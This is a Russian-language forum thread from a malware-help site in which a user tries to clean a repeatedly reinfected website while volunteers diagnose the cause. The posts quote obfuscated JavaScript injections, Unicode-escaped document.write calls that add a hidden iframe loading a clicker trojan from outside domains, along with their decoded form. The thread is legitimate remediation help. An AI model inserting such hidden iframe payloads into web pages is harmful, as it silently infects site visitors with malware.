Теперь компьютер чист, пароль поменян - значит, осталось очистить сайт от вредоносного кода и все должно стать хорошо
Теперь компьютер чист, пароль поменян - значит, осталось очистить сайт от вредоносного кода и все должно стать хорошо
I am not young enough to know everything...
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
И после очистки сайта можно сделать контрольные логи.
Сайт вроде почистил, пароль поменял, сделал контрольные логи.
Зашел что бы их отправить, дай-ка думаю загляну на сайт - ВИРУС!
Я вам наверное уже поднадоел.
Опять диск что ли отформатировать?
И опускать руки не хочется, но что делать уже не знаю и уже просто нет веры в успех.
Вложение 41506
Вложение 41507
Вложение 41508
в логах ничего подозрительного ...
но вот этого достаточно что бы воровать ваши пароли три раза в день ....
Platform: Windows XP SP1 (WinNT 5.01.2600)
Прошу прощения, а что это значит?
это значит что дырявый сп1 давно обновить ... иначе это никогда не прекратится ...
понял, спасибо, завтра этим и займусь
Вчера форматнул диск, поставил SP2, перезалил зараженные файла на сайт, сменил пароль и сегодня все по-прежнему - Вирус!
Может он где-то там в файлах сидит и как-то самоустанавливается в индексовые файлы?
Какие еще версии, уважаемые знатоки?
Чтобы окончательно снять подозрения с вашего компьютера, надо сделать комплект логов на вашей новой системе. Как раз на днях свежая версия AVZ вышла - 4.30, скачайте, сделайте - посмотрим.
I am not young enough to know everything...
Может мне сделать архив базы и свалисть к другому хостеру?
Будет ли это выходом?
Добавлено через 6 минут
Ок, скачаю обязательно (сейчас что-то не пускает) и выложу логи.
Последний раз редактировалось Sokil; 08.04.2008 в 15:01. Причина: Добавлено
Вот они мои логи.
По-моему все чисто.
хоть буркните что-нибудь!
..........ПОЖАЛУЙСТА!............
естественно ничего зловредного не видно ...
Ну ладно раз идей нет, выскажусь.
На сайте закладки много
Которые расшифровываются как<script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u00 6d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074 \u0074\u0070\u003a\u002f\u002f\u0061\u0074\u006f\u 006d\u0061\u006b\u0061\u0079\u0061\u006e\u002e\u00 62\u0069\u007a\u002f\u0061\u0066\u0074\u0065\u0072 \u0066\u0074\u0070\u0063\u0068\u0065\u006b\u002f\u 0032\u0036\u0030\u0033\u002f\u0069\u006e\u0064\u00 65\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069 \u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u 0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u00 74\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073 \u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u 0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u00 61\u006d\u0065\u003e');
</script>
А там сидит тот Trojan-Clicker.HTML.IFrame.mq возможно версии будут обновляться...это проблема "аффтара" который "рулит" источником заражения.Код:<iframe src=:http://ato****yan.biz/afterftpchek/2603/index.php width=1 height=1 style="display:none"></iframe>
Почистите и установите сложный пароль.
Возможно это Ваш случай.
Добавлено через 5 минут
Учетная запись администратора переименнована и запороленна? Наличие расшар или доступ к компьютеру других лиц? Наличие хорошего фаервола?
Последний раз редактировалось akoK; 09.04.2008 в 13:58. Причина: Добавлено
Спасибо, akoK!
Наконец-то мы сдвинулись и в правильном направлении.
Т.е., правильно ли я понял, что в страницах присутствует вышеприведенный зловредный код, который нужно вычистить.
Но не совсем пойму следующее предложение: "это проблема "аффтара" который "рулит" источником заражения."
Проблема эта моя, не отрицаю, но почему я "рулю" источником заражения???
Меня уже перечистили и перепроверили неоднократно.
Файервол еще не поставил. Пытался читать, но еще не определился - выбор слишком большой.
Расшар и доступа других лиц нет. Пароль ставлю всегда сложный.
Добавлено через 17 минут
Да, действительно вышеприведенный код был во всех страницах в корневом каталоге.
Почистил, меняю пароль и выбираю файервол.
Последний раз редактировалось Sokil; 09.04.2008 в 11:31. Причина: Добавлено
А-а, дак вы это еще не сделали??Сообщение от Sokil
Я же говорил об этом еще в сообщении #41.
Речь там о возможных обновлениях трояна, "аффтар" - не вы, а тот, кто содержит сайт, указанный в коде iframe, с которого грузится этот троян
I am not young enough to know everything...
Я делал это постоянно в тех файлах, которые мне советовал разработчик.
А сегодня обнаружил это во всех
И снова здравствуйте!
Почистил все страницы вручную, сменил пароль, но помогло ненадолго.
На главной странице периодически вставляетчя вот такой код:
<!-- o --><script type="text/javascript">document.write('\u003c\u0069\u0066\u00 72\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d \u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0074\u 0072\u0061\u0066\u0066\u0075\u0072\u006c\u002e\u00 72\u0075\u002f\u0073\u006c\u0069\u0076\u002f\u0069 \u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u 0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u00 20\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031 \u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u 0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u00 6e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069 \u0066\u0072\u0061\u006d\u0065\u003e');</script><!-- c -->
Откуда бьет?
Файервол пока не поставил, но что-то мне не сильно верится, что все дело в этом.
Причем, что интересно - хостится у меня там же еще один сайт, но там все чисто.
Осознанная целенаправленная атака.
Если я вам поднадоел - скажите не стесняйтесь - даже не обижусь.
Просто мне кажется, что вам, как проффесионалам должно быть интересно, а мне полезно.
От нашего с вами общения.
Спасибо.
Который расшифровываеться как
Прочитайте последний абзац в документе ссылку на который я Вам давал в посте №54.Код:<ifu00 72ame src= http://tu ****affurl.u00 72u/sliv/i ndex.phpu 0020width=1u00 20height=1 style="u 0064isplay:u00 6eone"></i frame>
Приветствую, Вас, господа!
Прочел я этот документ, со второго раза понял там намного больше, но честно говоря, где в Винде устаналиваются эти параметры я не знаю, а спрашивать у Вас наверное неуметно - это мне уже в другой форум.
Я решил поступить иначе.
Если это действительно программой-сниппером меня "сканят", то если пароль поменяю не я, то соответственно скань меня сколько влезит, а пароль не узнаешь.
Логично?
Сегодня я в очередной раз вычистил вручную код и попросил хостеров сменить мне пароль и выслать его почтой.
И что Вы думаете?
Хватило на пару-тройку часов.
Хочу понять где же "дыра". Сократить угол обстрела, так сказать.
Компьютер мой уже исключается полностью.
Ну не читают же они всю мою корреспонденцию!!!...
Поменять хостера?
Возни прилично, а решит ли это проблему?
Ну на кого еще думать?
Даже Вы вне подозрения!
Уважаемый(ая) Sokil, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
Ваши права в разделе
